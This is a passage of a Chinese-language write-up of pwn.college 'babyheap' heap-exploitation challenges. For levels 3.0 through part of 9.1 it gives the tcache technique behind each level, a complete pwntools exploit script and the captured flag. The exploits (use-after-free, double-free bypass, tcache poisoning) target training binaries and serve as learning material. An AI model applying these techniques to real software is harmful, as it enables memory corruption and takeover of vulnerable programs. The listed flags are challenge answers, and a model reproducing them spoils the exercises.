    read_flag()
    puts()

    response = target.recvall(timeout=0.01)
    if b"pwn.college{" in response:
        target.close()
        return True
    return False


def main():
    for bin in range(0x20, 0x410 + 1, 0x10):
        base_req = bin - 0x10
        ok = test_size(base_req)
        if ok:
            log.success(
                f"Found working requested size: {hex(base_req)} for tcache bin {hex(bin)}"
            )
            return
        log.warning("Exhausted candidates, none matched.")
    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{MihEcPIR1bQBmiQGOoGELSrscgW.0FN3MDL5cTNxgzW}]

Level 3.0

Information

Category: Pwn

Description

Create and exploit a use-after-free vulnerability to get the flag when multiple allocations occur.

Write-up

这题和之前也差不多，只不过 ptr 变成了可以容纳 16 个指针的数组，然后 read_flag 会 malloc 两次，flag 被写入第二次 malloc 返回的地址中。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    log,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level3.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx))
    target.sendlineafter(b"Size: ", str(size))


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx))


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx))


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    malloc(0, 773)
    malloc(1, 773)
    free(0)
    free(1)
    read_flag()
    puts(0)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{wvvL-j9QzjeoJrOsQS4Vval7exq.0VN3MDL5cTNxgzW}]

Level 3.1

Information

Category: Pwn

Description

Create and exploit a use-after-free vulnerability to get the flag when multiple allocations occur.

Write-up

参见 Level 3.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    args,
    context,
    log,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level3.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx))
    target.sendlineafter(b"Size: ", str(size))


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx))


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx))


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    malloc(0, 911)
    malloc(1, 911)
    free(0)
    free(1)
    read_flag()
    puts(0)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{wDLulwEpEQfpi78_Z4CAniTrByQ.0lN3MDL5cTNxgzW}]

Level 4.0

Information

Category: Pwn

Description

Corrupt the TCACHE entry_struct value to get the flag when multiple allocations occur.

Write-up

变变变，围绕一个特定的主题，逐步递增难度，最后产生各种不同的变式，这就是我最喜欢 pwn.college 的地方，对于学习各种利用姿势来说非常友好。

这题回到了一开始的样子，ptr 是一个全局变量，用于保存 malloc 返回的指针。read_flag 延续了上题的风格，会 malloc 两次，flag 被写到第二次 malloc 返回的地址中。

此外，新增了下面这个 scanf 功能：

      if ( strcmp(s1, "scanf") )
        break;
      v3 = malloc_usable_size(ptr);
      sprintf(s1, "%%%us", v3);
      v4 = malloc_usable_size(ptr);
      printf("[*] scanf(\"%%%us\", allocations[%d])\n", v4, 0);
      __isoc99_scanf(s1, ptr);
      puts(byte_246E);

它先通过 malloc_usable_size(ptr) 确定 ptr 保存的地址的 data 部分大小，然后通过 sprintf(s1, "%%%us", v3) 动态生成格式化字符串，写入 s1 中。%%%us 会先解析出一个 %，然后 %u 被解析为一个 unsigned int，最后加上 s，也就是根据 v4 动态生成 %v4s 这样的格式化字符串。

之后才是真正的读取输入，__isoc99_scanf(s1, ptr) 使用 s1 中保存的动态生成的格式化字符串，读取指定大小数据到 ptr 中。

:::important tcache / fastbin 都是单链表，只使用了 fd 指针。区别是 tcache 的 fd 指向下一个 free chunk 的 data 区域，而 fastbin 的 fd 指向的是下一个 free chunk 的 metadata 区域。 :::

上面聊完了程序的大致功能，下面说点正经的做题思路：

我们 malloc / free 操作都受限于 ptr 指针，这个指针是固定值，而我们又希望 read_flag 将 flag 地址保存在 ptr 指针中，怎么办？我想了很多方法，起码也得有 5 种奇怪的方案，比如先泄漏堆地址，然后改写 ptr 指针的内容为 flag 的地址……结果最后都掉进了一些奇奇怪怪的 pitfall 里 awww，这里就不展开细说了……最后在某一天清晨，当我洗漱完继续投入到这道题中时，与平日截然相反地，我拿起了纸和笔，试图重新理理思路……结果奇迹就发生了……

简单来说就是，先 malloc 一块和 flag 需要的大小相同的区域，这时候 ptr 就变成了 malloc 的返回值，然后我们 free 它，它会被丢进 tcachebin 中。这时候如果我们直接调用 read_flag 的话，它的第一个 malloc 肯定会拿到我们刚才 free 掉的那个 chunk，然后因为没有其它空闲 chunk 了，就会从 arena 中开辟一个新的 chunk 出来，这样的话 flag 的地址就永远不会和 ptr 保存的地址相同了……<s>不行！太恶劣了！我绝对不允许这种事情发生在我眼皮底下！</s>所以，问题的关键就在于我们有没有办法令 read_flag 第二次 malloc 取得的地址和第一次 malloc 取得的一样？很简单，free 两次，tcachebin 中不就有两个一样的 free chunk 了吗？但是这样会触发 double free 检测，程序直接 abort，那么问题就变成了我们应该如何绕过这个检测了。

这里我们需要研究一下 glibc-2.31 的源码（pwn.college 这一章用的都是 2.31）：薛定谔的 free chunks: Double Free, Double Fun ?

由于我们有 scanf 功能，可以向 ptr 指向的地址处写入数据，也就是说我们能写入 data 区。scanf 遇到换行则认为输入结束，并将换行替换为 \x00。我们想让 ptr 在 tcachebin 中出现两次，就可以这么玩：malloc -> free -> scanf -> free -> read_flag -> puts。至于这条攻击链的具体原理就自己琢磨去吧，我这里就不再过多赘述了。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level4.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Size: ", str(size).encode("ascii"))


def free():
    target.sendlineafter(b": ", b"free")


def puts():
    target.sendlineafter(b": ", b"puts")


def scanf(data):
    target.sendlineafter(b": ", b"scanf")
    target.sendline(data)


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    malloc(542)
    free()
    scanf(b"A" * 8)
    free()
    read_flag()
    puts()
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{oZ6_TOkCX4vXbuU0gTGgGHmYWRJ.01N3MDL5cTNxgzW}]

Level 4.1

Information

Category: Pwn

Description

Corrupt the TCACHE entry_struct value to get the flag when multiple allocations occur.

Write-up

参见 Level 4.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level4.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Size: ", str(size).encode("ascii"))


def free():
    target.sendlineafter(b": ", b"free")


def puts():
    target.sendlineafter(b": ", b"puts")


def scanf(data):
    target.sendlineafter(b": ", b"scanf")
    target.sendline(data)


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    malloc(708)
    free()
    scanf(b"A" * 8)
    free()
    read_flag()
    puts()
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{MHf4zKVq2DfY5MtZr8YZABG0Z4S.0FO3MDL5cTNxgzW}]

Level 5.0

Information

Category: Pwn

Description

Apply the TCACHE metadata in an unintended manner to set a value.

Write-up

这题又是 ptr 数组，read_flag 将 flag 读到它 malloc 返回的地址加上 16 字节偏移的位置。然后就是新增了一个 puts_flag 函数：

    if ( strcmp(s1, "puts_flag") )
      break;
    if ( *(_QWORD *)size_4 )
      puts(size_4 + 16);
    else
      puts("Not authorized!");

它检测 read_flag 的 malloc 返回的地址处的前 8 字节是否为空，不为空则输出 flag 。

对 mlloc_chunk 结构体熟悉的话就知道前 8 字节是 fd 的位置。那我们现在没有任何可以向 chunk data 写入数据的方法，如何修改 fd 呢？自然是 free 啦～

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level5.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendlineafter(b"Size: ", str(size).encode("ascii"))


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def puts_flag():
    target.sendlineafter(b": ", b"puts_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    malloc(0, 496)
    malloc(1, 496)
    free(0)
    free(1)
    read_flag()
    free(1)
    puts_flag()
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{ckg3CON3ru3-ygB82VxLMcRUuBS.0VO3MDL5cTNxgzW}]

Level 5.1

Information

Category: Pwn

Description

Apply the TCACHE metadata in an unintended manner to set a value.

Write-up

参见 Level 5.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level5.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendlineafter(b"Size: ", str(size).encode("ascii"))


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def puts_flag():
    target.sendlineafter(b": ", b"puts_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    malloc(0, 456)
    malloc(1, 456)
    free(0)
    free(1)
    read_flag()
    free(1)
    puts_flag()
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{YWZIg8kQV_nzpSzsFagMNO6O6Qn.0FM4MDL5cTNxgzW}]

Level 6.0

Information

Category: Pwn

Description

Corrupt the TCACHE entry_struct to read unintended memory.

Write-up

ptr 数组管理多个分配，scanf 向指定 chunk 写入 data，send_flag 验证输入的 secret 与随机生成的存放在 bss 中的 secret 是否相同，相同则输出 flag 。

这是生成随机 8 字节 secret 的部分：

  for ( i = 0; i <= 7; ++i )
    byte_428849[i] = rand() % 26 + 97;

由于没开 PIE，而生成的 secret 又是保存在 bss 段，所以我们可以精准定位 secret 的地址。

puts 将 ptr[idx] 视为字符串指针，输出其保存的内容。所以我们只要想办法令 malloc 返回给 ptr[idx] 的地址为 bss 上存放 secret 的地址就可以输出 secret 了。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    p32,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level6.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendlineafter(b"Size: ", str(size).encode("ascii"))


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", str(secret).encode("ascii"))


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    secret = elf.bss() + 0x18849

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    scanf(0, p32(secret))
    malloc(0, 0)
    malloc(0, 0)
    puts(0)

    target.recvuntil(b"Data: ")
    secret = target.recvline().strip().decode("ascii")
    send_flag(secret)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{wLCxyleFYPCBwUq2LzFkqEM8qzv.0VM4MDL5cTNxgzW}]

Level 6.1

Information

Category: Pwn

Description

Corrupt the TCACHE entry_struct to read unintended memory.

Write-up

参见 Level 6.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    p32,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level6.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendlineafter(b"Size: ", str(size).encode("ascii"))


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", str(secret).encode("ascii"))


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    secret = elf.bss() + 0x1B553

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    scanf(0, p32(secret))
    malloc(0, 0)
    malloc(0, 0)
    puts(0)

    target.recvuntil(b"Data: ")
    secret = target.recvline().strip().decode("ascii")
    send_flag(secret)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{oc9V7EmGNRr7415ZlPgXYL-qDjV.0lM4MDL5cTNxgzW}]

Level 7.0

Information

Category: Pwn

Description

Corrupt the TCACHE entry_struct to read unintended memory.

Write-up

和上题一样，但是这次变成了 16 字节随机值：

  for ( i = 0; i <= 15; ++i )
    byte_429532[i] = rand() % 26 + 97;

问题就在于，按照上个方法我们令 malloc 拿到 secret 的地址后，它会将 e->key = NULL，导致后 8 字节被清空。

但是也很好解决。既然我们可以泄漏出前 8 字节，那我们将偏移加 8 再来一次不就泄漏出后 8 字节了吗？

分析下面设置 seed 的流程我们知道，seed 每次运行程序都是一样的，由于上面生成随机 secret 的部分用的是伪随机数发生器，所以每次运行结果也是不变的，那就没啥好担心的了。

unsigned __int64 flag_seed()
{
  unsigned int seed; // [rsp+4h] [rbp-9Ch]
  unsigned int i; // [rsp+8h] [rbp-98h]
  int fd; // [rsp+Ch] [rbp-94h]
  _QWORD buf[17]; // [rsp+10h] [rbp-90h] BYREF
  unsigned __int64 v5; // [rsp+98h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(buf, 0, 128);
  fd = open("/flag", 0);
  if ( fd < 0 )
    __assert_fail("fd >= 0", "<stdin>", 0x20u, "flag_seed");
  if ( read(fd, buf, 0x80uLL) <= 0 )
    __assert_fail("read(fd, flag, 128) > 0", "<stdin>", 0x21u, "flag_seed");
  seed = 0;
  for ( i = 0; i <= 31; ++i )
    seed ^= *((_DWORD *)buf + (int)i);
  srand(seed);
  memset(buf, 0, 128uLL);
  return __readfsqword(0x28u) ^ v5;
}

反正我用的方法比较简单粗暴，不过我也想过一次性泄漏完整的 secret，那就需要伪造 chunk size，提前做点布局……实际操作起来还挺麻烦的，也就没继续深入……

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    p32,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level7.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendlineafter(b"Size: ", str(size).encode("ascii"))


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", str(secret).encode("ascii"))


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    secret_p1 = elf.bss() + 0x19532
    secret_p2 = secret_p1 + 0x8

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    scanf(0, p32(secret_p1))
    malloc(0, 0)
    malloc(0, 0)
    puts(0)

    target.recvuntil(b"Data: ")
    secret_p1 = target.recvline().strip().decode("ascii")
    target.success(f"Part 1: {secret_p1}")
    target.close()
    launch()

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    scanf(0, p32(secret_p2))
    malloc(0, 0)
    malloc(0, 0)
    puts(0)

    target.recvuntil(b"Data: ")
    secret_p2 = target.recvline().strip().decode("ascii")
    target.success(f"Part 2: {secret_p2}")

    secret = secret_p1 + secret_p2
    send_flag(secret)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{QXpTguKBiT4StYFr24ZsUSfm3-8.01M4MDL5cTNxgzW}]

Level 7.1

Information

Category: Pwn

Description

Corrupt the TCACHE entry_struct to read unintended memory.

Write-up

参见 Level 7.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    p32,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/babyheap_level7.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendlineafter(b"Size: ", str(size).encode("ascii"))


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", str(secret).encode("ascii"))


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    secret_p1 = elf.bss() + 0x17051
    secret_p2 = secret_p1 + 0x8

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    scanf(0, p32(secret_p1))
    malloc(0, 0)
    malloc(0, 0)
    puts(0)

    target.recvuntil(b"Data: ")
    secret_p1 = target.recvline().strip().decode("ascii")
    target.success(f"Part 1: {secret_p1}")
    target.close()
    launch()

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    scanf(0, p32(secret_p2))
    malloc(0, 0)
    malloc(0, 0)
    puts(0)

    target.recvuntil(b"Data: ")
    secret_p2 = target.recvline().strip().decode("ascii")
    target.success(f"Part 2: {secret_p2}")

    secret = secret_p1 + secret_p2
    send_flag(secret)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{cy0iZfUAyZ9bbo5DL_cS-9sxRN6.0FN4MDL5cTNxgzW}]

Level 8.0

Information

Category: Pwn

Description

Leverage TCACHE exploits to pass a validation check.

Write-up

和上题几乎是一样的，除了这次 secret 被刻意放在了以 \x0a 结尾的地址处。由于它代表 LF (Line Feed)，所以我们不能直接通过 scanf 将它读入，最终会少写一个 \x0a。只要解决了这个问题，其它的问题就可以直接套用上题 exp 思路了。

感觉这题还是有一点小难的，至少对于刚开始学的我来说并不简单。当时卡了我两天，没有什么头绪，唯一想到可行的解法是 scanf overwrite fd，指向 secret 地址向后偏移 4 字节的地方，然后我们可以就可以泄漏 12/16 的 secret 了。问题是，如何得到剩下的四个字符呢？我想过伪造 chunk 什么的方法，但是都已失败告终了。最后，我还是老老实实的写了个 bruteforce 的 approach，结果预估了一下时间，爆破四个小写字母，也就是 $1/26^{4}$ 的 chance 成功，单线程都跑不满的情况下，得要 2h 45min……草啊，我本地得测试吧，3h 没了，远程再打一遍，3h 又没了。虽然这个方法可行，但是感觉也太蠢了……

后来尝试让 AI 写个多线程爆破的 approach，写的和屎一样，最后虽然写出来了，但还是有点问题，总之虽然爆破理论可行，但是因为我运气不好，就没见过它爆出来的样子……

不过回想起去年，也让 AI 写过多线程爆破的脚本，相比那次，这次代码质量算高了好几倍了，发展的还是很快的/悲

遂又去思考更好的方法，思考能不能泄漏完整的 secret 。想了整整一下午，没想出来，感觉完整泄漏好像不太可能，然后盯着检测代码发呆，~试图看穿屏幕……~

    if ( strcmp(s1, "send_flag") )
      break;
    printf("Secret: ");
    __isoc99_scanf("%127s", s1);
    puts(s_0);
    if ( !memcmp(s1, s2_0, 0x10u) )
    {
      puts("Authorized!");
      win();
    }
    else
    {
      puts("Not authorized!");
    }

既然不能泄漏完整的 secret，那还有没有其它通过这个检测的方法呢？思考……突然灵光闪现，因为 malloc 从 tcache 取 chunk 会将它的 key 清空，那如果我们 malloc 到 secret 前面，然后让 tcache_get 将 secret 的前 8 字节清空，是不是就相当于知道了 secret 的前 8 字节为 NULL？然后结合我们之前的思路，可以泄漏后 8 字节……草，出了！

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    p32,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level8.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendlineafter(b"Size: ", str(size).encode("ascii"))


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", secret)


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    secret = elf.bss() + 0x1230A + 0x8
    zero_out = elf.bss() + 0x1230A - 0x8

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    scanf(0, p32(secret))
    malloc(0, 0)
    malloc(0, 0)
    puts(0)
    target.recvuntil(b"Data: ")
    secret = target.recvline().strip()

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    # raw_input("DEBUG")
    scanf(0, p32(zero_out))
    malloc(0, 0)
    malloc(0, 0)

    # raw_input("DEBUG")
    payload = flat(
        0,
        secret,
    )
    send_flag(payload)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{4xf_sG0yXaGhMXdibln3SOAB5xv.0VN4MDL5cTNxgzW}]

Level 8.1

Information

Category: Pwn

Description

Leverage TCACHE exploits to pass a validation check.

Write-up

参见 Level 8.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    p32,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level8.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendlineafter(b"Size: ", str(size).encode("ascii"))


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode("ascii"))
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", secret)


def quit():
    target.sendlineafter(b": ", b"quit")


def main():
    launch()

    secret = elf.bss() + 0x19E0A + 0x8
    zero_out = elf.bss() + 0x19E0A - 0x8

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    scanf(0, p32(secret))
    malloc(0, 0)
    malloc(0, 0)
    puts(0)
    target.recvuntil(b"Data: ")
    secret = target.recvline().strip()

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    # raw_input("DEBUG")
    scanf(0, p32(zero_out))
    malloc(0, 0)
    malloc(0, 0)

    # raw_input("DEBUG")
    payload = flat(
        0,
        secret,
    )
    send_flag(payload)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{0K4zGLVnFNCz2zhqd0R7tWLsOLW.0lN4MDL5cTNxgzW}]

Level 9.0

Information

Category: Pwn

Description

Leverage TCACHE exploits to pass a validation check.

Write-up

和上题一样，但是这次不能分配到 secret 附近了，泄漏完全不可能。不过还是可以利用 tcache_get 清空 key 的特性将 secret 完全清空，这样我们就知道 secret 为 NULL 了。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    p32,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level9.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", secret)


def quit():
    target.sendlineafter(b": ", b"quit")


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    secret_p1 = elf.bss() + (0x16364 - 0x8)
    secret_p2 = elf.bss() + 0x16364

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    scanf(0, p32(secret_p1))
    # raw_input("DEBUG")
    malloc(0, 0)
    malloc(0, 0)

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)
    scanf(0, p32(secret_p2))
    # raw_input("DEBUG")
    malloc(0, 0)
    malloc(0, 0)

    payload = flat(0, 0)
    send_flag(payload)
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{klIR9JBrG0FfOAzXz_dLAeG0C5g.01N4MDL5cTNxgzW}]

Level 9.1

Information

Category: Pwn

Description

Leverage TCACHE exploits to pass a validation check.

Write-up

参见 Level 9.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    p32,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level9.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
